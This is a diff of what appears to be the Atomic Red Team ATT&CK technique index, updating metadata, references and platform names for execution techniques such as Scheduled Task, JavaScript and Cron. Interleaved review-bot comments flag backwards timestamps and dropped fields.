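Review bot: `x_mitre_attack_spec_version: 2.1.0` is removed for T1574.012 at the top of this hunk with no replacement value, whereas the surrounding techniques are re-stamped to 3.2.0; together with the backwards `modified` date in the previous hunk this looks like T1574.012 was rebuilt from a stale object and deserves a second look. The T1053.005 description rewrite itself is consistent: both new citation keys, `(Citation: Stack Overflow)` and `(Citation: Red Canary - Atomic Red Team)`, have matching `source_name` entries added to `external_references` further down in this diff.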
@@ -24271,7 +24588,7 @@ execution:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -24303,8 +24620,8 @@ execution:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -24318,6 +24635,10 @@ execution:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
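Review bot: the new `Red Canary - Atomic Red Team` reference points at `.../blob/master/atomics/T1053.005/T1053.005.md`, i.e. an unpinned `master` URL back into this same repository. That mirrors the upstream ATT&CK reference, so it is not wrong here, but it means the cited document is whatever the file happens to be at read time; if the project ever wants stable citations, a commit-pinned URL (or a tag) would be the place to note it.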
@@ -24330,16 +24651,19 @@ execution:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1047:
technique:
- modified: '2024-04-11T18:13:25.130Z'
+ modified: '2024-10-15T15:20:57.328Z'
name: Windows Management Instrumentation
description: |-
Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
@@ -24405,7 +24729,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1047
atomic_tests: []
T1129:
@@ -24482,66 +24805,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1129
atomic_tests: []
T1059.007:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Cody Thomas, SpecterOps
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
- type: attack-pattern
- created: '2020-06-23T19:12:24.924Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1059.007
- url: https://attack.mitre.org/techniques/T1059/007
- - source_name: NodeJS
- url: https://nodejs.org/
- description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
- - source_name: JScrip May 2018
- url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
- description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
- June 23, 2020.
- - source_name: Microsoft JScript 2007
- url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
- description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
- ECMAScript …. Retrieved June 23, 2020.
- - source_name: Microsoft Windows Scripts
- url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
- description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
- June 23, 2020.
- - source_name: Apple About Mac Scripting 2016
- url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
- description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
- 14, 2021.
- - source_name: SpecterOps JXA 2020
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
- 2021.
- - source_name: SentinelOne macOS Red Team
- url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
- description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
- APIs Without Building Binaries. Retrieved July 17, 2020.'
- - source_name: Red Canary Silver Sparrow Feb2021
- url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
- description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
- wings: Outing macOS malware before it takes flight. Retrieved April 20,
- 2021.'
- - source_name: MDSec macOS JXA and VSCode
- url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
- description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
- with VSCode Extensions. Retrieved April 20, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-07-30T14:12:52.698Z'
name: 'Command and Scripting Interpreter: JavaScript'
description: |-
Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
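Review bot: the fifty-plus removed lines for T1059.007 (platforms, domains, contributors, id, created, external_references) are a key reorder rather than a deletion; the same content reappears at the end of the object in the next hunk, in a different key order and with the references re-sorted. If the generator serialises keys in whatever order the upstream bundle supplies, sorting them before dumping would keep future diffs reviewable; as it stands a reviewer has to match the two hunks by hand to confirm that every reference survived.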
@@ -24554,31 +24822,83 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_contributors:
+ - Cody Thomas, SpecterOps
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
Monitor for execution of JXA through osascript
and usage of OSAScript
API that may be related to other suspicious behavior occurring on the system.
Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- 'Script: Script Execution'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+ created: '2020-06-23T19:12:24.924Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1059/007
+ external_id: T1059.007
+ - source_name: Apple About Mac Scripting 2016
+ description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
+ 14, 2021.
+ url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
+ - source_name: MDSec macOS JXA and VSCode
+ description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
+ with VSCode Extensions. Retrieved April 20, 2021.
+ url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
+ - source_name: Microsoft JScript 2007
+ description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+ ECMAScript …. Retrieved June 23, 2020.
+ url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+ - source_name: Microsoft Windows Scripts
+ description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+ June 23, 2020.
+ url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+ - source_name: JScrip May 2018
+ description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+ June 23, 2020.
+ url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+ - source_name: NodeJS
+ description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+ url: https://nodejs.org/
+ - source_name: SentinelOne macOS Red Team
+ description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+ APIs Without Building Binaries. Retrieved July 17, 2020.'
+ url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+ - source_name: SpecterOps JXA 2020
+ description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
+ 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: Red Canary Silver Sparrow Feb2021
+ description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
+ wings: Outing macOS malware before it takes flight. Retrieved April 20,
+ 2021.'
+ url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1059.007
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
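Review bot: `x_mitre_permissions_required` (User, Administrator, SYSTEM) is removed from T1059.007 and is not re-added in the re-serialised tail, while the otherwise identical re-serialisation of T1053.003 later in this diff keeps `x_mitre_permissions_required: - User`. Confirm against the upstream bundle that the field was really dropped for T1059.007; the 2.1 to 2.2 version bump alone does not say so. The rest of the tail (`revoked: false`, `x_mitre_deprecated: false`, `x_mitre_remote_support: false`, `x_mitre_attack_spec_version` jumping 2.1.0 to 3.2.0) is consistent with the object having been rebuilt from a current ATT&CK release rather than patched in place.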
@@ -24636,9 +24956,8 @@ execution:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1559.002:
@@ -24730,20 +25049,19 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1559.002
atomic_tests: []
T1204.002:
technique:
- modified: '2023-04-21T12:22:19.740Z'
+ modified: '2024-09-25T20:50:34.876Z'
name: 'User Execution: Malicious File'
description: "An adversary may rely upon a user opening a malicious file in
order to gain execution. Users may be subjected to social engineering to get
them to open a file that will lead to code execution. This user action will
typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
Adversaries may use several types of files that require a user to execute
- them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries
- may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
+ them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and
+ .reg.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
to increase the likelihood that a user will open and successfully execute
a malicious file. These methods may include using a familiar naming convention
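Review bot: T1559.002 at the top of this hunk keeps `x_mitre_attack_spec_version: 3.1.0` while losing its `spec_version`, unlike the neighbouring techniques that are bumped to 3.2.0. If that is simply because upstream has not re-stamped T1559.002, fine, but it is the kind of per-object inconsistency worth stating in the PR description so it is not mistaken for a generator bug. The `.reg` addition to the T1204.002 file-type list is upstream description text and needs nothing here beyond the 1.3 to 1.4 version bump that follows.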
@@ -24771,7 +25089,7 @@ execution:
- Linux
- macOS
- Windows
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -24791,33 +25109,13 @@ execution:
url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1204.002
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -24834,6 +25132,7 @@ execution:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -24844,9 +25143,13 @@ execution:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -24854,8 +25157,24 @@ execution:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1559.001:
@@ -24895,7 +25214,7 @@ execution:
description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
Application COM Object. Retrieved November 21, 2017.
source_name: Enigma MMC20 COM Jan 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-07-26T22:51:20.448Z'
name: Component Object Model
description: |-
Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
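Review bot: another backwards `modified` timestamp, this time T1559.001 going from '2022-04-25T14:00:00.188Z' to '2021-07-26T22:51:20.448Z'; same question as for T1574.012, which upstream revision did the generator read? Both regressions land on objects that also lose `x_mitre_attack_spec_version: 2.1.0` without a 3.2.0 replacement (T1559.001's removal is in the next hunk), so they most likely share a root cause and should be fixed together rather than hand-edited.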
@@ -24920,12 +25239,10 @@ execution:
- 'Script: Script Execution'
- 'Process: Process Creation'
x_mitre_remote_support: true
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -25005,11 +25322,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.002:
technique:
- modified: '2024-03-01T19:06:05.126Z'
+ modified: '2024-10-15T14:18:20.087Z'
name: 'Command and Scripting Interpreter: AppleScript'
description: |-
Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@@ -25069,12 +25385,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.002
atomic_tests: []
T1106:
technique:
- modified: '2023-10-13T16:01:07.538Z'
+ modified: '2024-09-12T15:25:57.058Z'
name: Native API
description: |-
Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
@@ -25172,9 +25487,9 @@ execution:
2021.
url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
- source_name: Microsoft Win32
description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
March 15, 2020.
@@ -25191,19 +25506,18 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1106
atomic_tests: []
T1059.010:
technique:
- modified: '2024-04-10T16:05:22.456Z'
+ modified: '2024-04-28T15:58:48.119Z'
name: AutoHotKey & AutoIT
description: |-
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
- These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
+ These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
@@ -25212,7 +25526,7 @@ execution:
- Liran Ravich, CardinalOps
- Serhii Melnyk, Trustwave SpiderLabs
- Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
- - Monty
+ - "@_montysecurity"
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -25249,11 +25563,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:44:20.143Z'
name: Cloud API
description: "Adversaries may abuse cloud APIs to execute malicious commands.
APIs available in cloud environments provide various functionalities and are
@@ -25290,11 +25603,10 @@ execution:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
x_mitre_remote_support: false
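Review bot: the platform list for T1059.009 changes from Azure AD, Office 365 and Google Workspace to Office Suite and Identity Provider, which changes which per-platform index this technique belongs to. Make sure every index keyed on the old platform names is regenerated from the same run, otherwise the master index and the per-platform CSVs will disagree about where T1059.009 lives. The 1.0 to 1.1 version bump is consistent with an upstream platform re-mapping, so the change itself looks correct.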
@@ -25313,13 +25625,12 @@ execution:
url: https://github.com/Azure/azure-powershell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1610:
technique:
- modified: '2024-04-11T21:24:42.680Z'
+ modified: '2024-10-15T15:06:17.124Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -25398,12 +25709,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1610
atomic_tests: []
T1059:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Command and Scripting Interpreter
description: |-
Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
@@ -25414,6 +25724,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: |-
Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -25424,16 +25735,16 @@ execution:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- - Office 365
- - Azure AD
- IaaS
- - Google Workspace
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Script: Script Execution'
- 'Process: Process Creation'
@@ -25464,14 +25775,11 @@ execution:
url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059
atomic_tests: []
T1609:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:25:45.507Z'
name: Kubernetes Exec Into Container
description: |-
Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
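Review bot: the two removals for T1059 here (`x_mitre_attack_spec_version: 3.1.0` and `x_mitre_modified_by_ref`) are balanced by the additions near the top of the same object in the two preceding hunks (`x_mitre_attack_spec_version: 3.2.0` after `phase_name: execution`, and the identical `identity--c78cb6e5-...` ref after `x_mitre_is_subtechnique`), so this is a move plus bump, not a loss. Worth a glance only because the same key reorder elsewhere in this diff does drop a field (`x_mitre_permissions_required` on T1059.007).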
@@ -25537,39 +25845,13 @@ execution:
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1609
atomic_tests: []
T1569.001:
technique:
- x_mitre_platforms:
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
- type: attack-pattern
- created: '2020-03-10T18:26:56.187Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1569.001
- url: https://attack.mitre.org/techniques/T1569/001
- - source_name: Launchctl Man
